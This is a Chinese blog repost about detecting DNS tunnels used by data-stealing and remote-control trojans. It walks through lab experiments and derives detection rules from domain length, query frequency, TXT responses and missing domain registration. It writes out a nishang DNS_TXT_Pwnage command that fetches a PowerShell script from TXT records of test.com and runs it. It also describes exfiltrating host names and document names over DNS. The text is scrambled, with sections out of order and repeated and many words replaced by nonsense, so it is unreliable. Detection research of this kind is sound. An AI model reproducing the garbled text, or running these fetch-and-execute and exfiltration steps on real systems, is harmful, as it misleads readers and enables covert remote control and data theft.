一次误报引发的DNS检测方案的思考:DNS隧道检测平民解决方案

  • 时间:
  • 浏览:1
  • 来源:大发彩神8下载最新版—大发快三官网大发彩神

c)     在dns服务器建立对应txt记录(后续执行需按照1,2,3,4的顺序,统统 建立记录名为1)

2、外传结果抓包:

为验证此方案的逻辑正确性,笔者实验如下:

d)     使用nishang的DNS_TXT_Pwnage读取txt并执行(脚本自动在test.com前加1,向1.test.com请求txt记录作为脚本执行。不过笔者最终也没玩转信用卡 stopstring这名参数的原理,懂的统统人麻烦私信下,谢谢! ),可正常获取服务列表。

3、检测逻辑匹配分析:

e)     此实验场景未覆盖外传数据,统统 不涉及注册问提

1、 血块信息窃取和血块信息窃取

{【处于txt回包】and 【不处于全域名注册记录】}  or  {【终端无守护进程对返回的A记录(如有)发起访问】  and 【不处于全域名注册记录】}

3、检测逻辑匹配分析:

c)     不处于全域名注册记录

检测远控木马(需更新和接收指令):         【域名超长 or 频率高】  and 【终端无守护进程对返回的A记录(如有)发起访问】 and 【不处于全域名注册记录】 and 【处于txt回包】 

b)     对解析A记录结果无后续访问

DNS_TXT_Pwnage -startdomainstartflag.test.com -cmdstring nostart -commanddomain  txt1.test.com -psstring startflag -psdomain test.com -Subdomains 1 -stopstring stopflag

a)     单次血块信息窃取外传

2、外传结果抓包:

a)     编写有另一个 最简单的的话脚本,获取服务列表

b)     频率较高

b)     使用nishang的Out-NnsTxt将脚本GetServiceToTxt.ps1转换为txt记录

c)     类型为TXT,有回包

a)     利用A记录外传,非txt回包,长度不超长(实验意味 ,未充分利用域名长度),但频率较高,解析过程未发现异常(但此截图为8.8.8.8,非系统dns处于一定风险)

命令和结果如下:

b)     因实验未将结果外传,统统 频率不高,且只获取远端的get-server功能,频率本来我高,但要实现外传和获取更多功能(如mimikatz等),则必然可以高频率

3、检测逻辑匹配分析:

2、外传结果展示:

通过以上分析得出监控可以关注的哪几只帕累托图:长域名、频率、txt类型、终端有无 对解析ip发起访问、有无 有全域名注册记录,推导检测逻辑如下: 

结论:窃密木马+远控木马

c)     类型为TXT,有回包

b)     多次血块信息窃取

验证结果,ok

本文转自张昺华-sky博客园博客,原文链接:http://www.cnblogs.com/bonelee/p/76511006.html,如需转载请自行联系原作者

使用Microsoft Network Monitor抓包分析

群体事件检测:     A机器域名长度(3+N级的域名)* A机器域名数量(相同只计算有另一个 )  + B +…  >   多台机器阈值,评测外传数据大小,达到阈值则触发报警

a)     因实验未将结果外传,统统 域名长度不大,如dns隧道外传则必使用长域名

方向2:基于外传量检测,发现正在进行的血块数据泄露(不分析细节,仅供参考,本次实验不涉及):

检测窃密木马(不要再更新和接收指令):     【域名超长 or 频率高】  and 【终端无守护进程对返回的A记录(如有)发起访问】 and 【不处于全域名注册记录】

1、直接运行xshell,触发dns行为

单台机器检测:    域名长度(3+N级的域名) * 域名数量(相同只计算有另一个 ) > 单台机器阈值,评测外传数据大小,达到阈值则触发报警

结论:窃取数据木马

a)     外传域名超长

摘自:http://www.freebuf.com/articles/network/149328.html

d)     无A记录解析结果,也就无守护进程对结果发起访问

1、利用powershell构造dns隧道

b)    多次血块信息窃取,编写脚本,搜索文档(word、excel、ppt),并外传文件名(此脚本3100 未报警),vbs脚本内容如下 (代码未充分验证,不保证无错误,中文支持或读文件内容请自行修改):

e)     不处于全域名注册记录(黑客根据算法提前注册了帕累托图域名,但全域名无注册信息)

结论:远控木马(实验功能较单一,扩展为大马则可精确覆盖检测形状)

a)     单次血块信息窃取外传,简单利用windows命令(ping、nslookup等)即可窃取机器名

通用检测(可发现单次外传,处于浏览器预解析等误报,需结合统统形状确认):

方向1:形状检测:

d)     无A记录解析结果,也就无守护进程对结果发起访问